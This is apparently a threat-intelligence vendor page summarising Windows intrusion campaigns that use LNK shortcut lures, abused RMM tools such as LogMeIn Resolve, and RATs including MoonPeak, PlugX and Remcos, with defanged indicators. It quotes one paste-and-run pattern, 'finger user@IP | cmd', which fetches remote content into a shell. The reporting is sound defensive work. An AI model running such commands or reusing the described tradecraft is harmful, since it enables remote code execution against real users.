Threat actors abuse shortcut files and legitimate RMM tools to gain persistent access to Windows systems
Threat actors are increasingly relying on living-off-the-land techniques and trusted tooling to establish persistent access on Windows endpoints. One campaign used weaponized Windows shortcut (.LNK) files disguised as investment-related PDFs to deliver MoonPeak, a remote access trojan assessed as a XenoRAT variant and linked to North Korea–aligned activity targeting South Korean investors and cryptocurrency traders. Opening the .LNK launches an obfuscated PowerShell-driven, multi-stage infection chain while displaying a decoy PDF; analysis also tied payload hosting to attacker-controlled GitHub repositories, reflecting “Living Off Trusted Sites (LOTS)” tradecraft.
A separate dual-wave intrusion chain used phishing emails masquerading as Greenvelope invitations to steal webmail credentials (e.g., Outlook, Yahoo, AOL), then used the compromised accounts to register for and silently deploy LogMeIn Resolve (formerly GoTo Resolve) for persistent remote access. The installer (GreenVelopeCard.exe) was described as signed and configured to connect to attacker-controlled infrastructure, with follow-on actions including modifying service settings for elevated access and creating hidden scheduled tasks for resilience. Related threat intelligence reporting also highlighted broader “rogue RMM” abuse trends, including Remcos and NetSupport Manager delivery via paste-and-run lures and PowerShell/cmd execution chains (including use of the finger utility to fetch remote payloads), underscoring that adversaries are operationalizing legitimate remote administration software as a stealthy backdoor mechanism.
Get ahead of threats like this
Mallory correlates global threat intelligence with your attack surface — know if you’re exposed before adversaries strike.
How this story unfolded
2 events from the most recent confirmed update back to the earliest known activity.
KnowBe4 discloses 'Skeleton Key' phishing-to-RMM intrusion campaign
KnowBe4 Threat Labs disclosed a dual-vector intrusion campaign dubbed 'Skeleton Key' in which Greenvelope-themed phishing pages steal email credentials and the attackers use those credentials to register LogMeIn/GoTo Resolve access for persistence. The operation uses a follow-on executable, GreenVelopeCard.exe, plus service changes, registry manipulation, and hidden scheduled tasks to maintain stealthy access through legitimate RMM software.
MoonPeak LNK malware campaign first detected targeting South Korean users
IIJ Security Diary analysts reported first detecting a Windows malware campaign in January 2026 that used deceptive LNK shortcut files disguised as investment or trading PDFs. The activity, linked to North Korea-affiliated threat actors, primarily targeted South Korean investors and cryptocurrency traders and ultimately deployed the MoonPeak RAT.
Related entities
Vulnerabilities, threat actors, malware, products, organizations, and breaches Mallory has linked to this story.
Sources
3 references tracked. Mallory keeps watching after this page renders.
Trusted RMM tools weaponized for stealthy malware compromise | SC Media
scworld.com
Open sourceThreat Actors Weaponizes LNK File to Deploy MoonPeak Malware Attacking Windows Systems
cybersecuritynews.com
Open sourcePhishing Attack Uses Stolen Credentials to Install LogMeIn RMM for Persistent Access
thehackernews.com
Open sourceSee the full picture, correlated to your attack surface.
Map indicators from this story to your assets and identify affected systems in minutes.
Every observed campaign, victim, and pivot linked to actors named in this story.
Malware, exploits, and IOCs connected to the activity described here.
YARA, Sigma, and Snort rules deployed to your SIEM as soon as they’re published.
Get matching new stories delivered to your team as they break — not the next morning.
Ask questions about this story and take action on the answers.
Related stories
Other stories Mallory is tracking that overlap on entities, sources, or topic labels.
Phishing campaigns using Windows LNK files and PowerShell loaders to deliver RATs and ransomware
Multiple recent intrusion reports describe **phishing-led Windows compromises** that rely on **weaponized `.LNK` shortcuts** to trigger **obfuscated PowerShell** execution, display decoy documents, and then fetch additional payloads from public cloud/code platforms. In South Korea, attackers distributed an LNK disguised as financial trading guidance that opens a decoy PDF while running PowerShell; subsequent stages perform anti-analysis/virtualization checks, establish persistence, and retrieve a masked executable from **GitHub** that decrypts code at runtime to run **MoonPeak** malware. Researchers assessed the activity as likely **North Korea–linked** based on GitHub commit metadata and naming patterns. A separate Russia-targeted campaign used business-themed archives containing decoy documents and a malicious LNK to pull a PowerShell loader that establishes persistence and then weakens defenses (including **Microsoft Defender exclusion changes** and use of **`defendnot`**), performs reconnaissance, and tampers with system tooling and file associations before deploying **Amnesia RAT** (fetched from **Dropbox**) and a **Hakuna Matata–derived ransomware** payload for encryption. By contrast, reporting on **KazakRAT** describes a different espionage operation in Kazakhstan/Afghanistan delivered via malicious **MSI** installers and using simple, unencrypted HTTP C2; it is not part of the LNK/PowerShell delivery chains described in the other incidents.
Mar 21, 2026
LNK-Based Malware Campaigns Deliver PlugX and Custom .NET RAT
Researchers documented two separate but related **LNK-driven intrusion chains** that used shortcut files as the initial lure to fetch additional malware from attacker-controlled infrastructure. In one campaign targeting organizations in the **Arabian Gulf region**, a China-nexus threat actor used a Middle East conflict-themed ZIP archive containing an LNK file that downloaded a malicious CHM file and ultimately deployed a **PlugX** backdoor. The infection chain progressed through a second LNK, a TAR archive, DLL sideloading, and a shellcode loader before installing PlugX with persistence under a fake Microsoft Display Broker path and service name. The malware used RC4-encrypted components, API hooking, reflective DLL loading, corrupted PE headers, and support for **TCP, HTTPS, UDP, and DoH** communications, with a decrypted command-and-control endpoint at `91.193.17[.]117:443` and plugins for keylogging, shell access, screen capture, registry, service, and network operations. A second investigation exposed a live **LNK-to-DLL-to-.NET RAT** operation staged from an open Apache directory on `wildishadventure[.]com/secure9/` and `171.22.182[.]231/secure9/`, where researchers recovered weaponized LNK files, custom DLL downloaders, backup files, and a final payload named `RemoteMgmt.Agent.exe`. That chain abused the legacy `ActiveXObject('htmlfile')` technique to force Windows to retrieve DLLs over UNC paths, then delivered a custom .NET 4.8 remote access trojan that supported command execution, token-based authentication, JSON-over-raw-TCP C2 over port 443, reconnect-based persistence, and logging to `%TEMP%\rmgmt_agent.log`. Operational security failures including exposed directory indexing, `.old` backups, test builds, and unstripped internal names allowed investigators to reconstruct the malware’s development workflow and identify infrastructure spanning **BlueVPS**, **Namecheap**, and **Cloudflare**.
Apr 25, 2026
Malware Delivery via Social Engineering: Phishing Lures, Fake Browser Alerts, and Paste-and-Run Payloads
Multiple threat reports describe **social-engineering-driven malware delivery** leading to remote access and follow-on payload deployment. Fortinet observed a **multi-stage phishing campaign targeting users in Russia** that delivers **Amnesia RAT** and ransomware via business-themed decoy documents and a malicious `.lnk` shortcut using a double extension (e.g., `*.txt.lnk`). The infection chain uses public cloud services for staging—**GitHub** for scripts and **Dropbox** for binary payloads—and abuses **defendnot** to trick Windows into believing a third-party AV is installed, effectively disabling **Microsoft Defender** before later-stage execution. Separately, Huntress attributed activity to **KongTuke**, which uses **malicious browser extensions** to display fake “browser crash” security alerts (“**CrashFix**”) that pressure users into running attacker-provided commands, and also deploys a Python RAT dubbed **ModeloRAT**. ModeloRAT is described as heavily obfuscated, using **Windows Registry** persistence and **RC4**-encrypted communications, with the ability to deliver additional payloads (DLLs, executables, scripts). Red Canary’s January intelligence update highlights **Scarlet Goldfinch** activity using **paste-and-run** lures and a notable technique of using the Windows `finger` client to pull remote content (e.g., `finger user@IP | cmd`), followed by `curl` download of an archive masquerading as a PDF and extraction via `tar -xf`, culminating in **Remcos** (and sometimes **NetSupport**) delivered via **DLL sideloading**.
Mar 21, 2026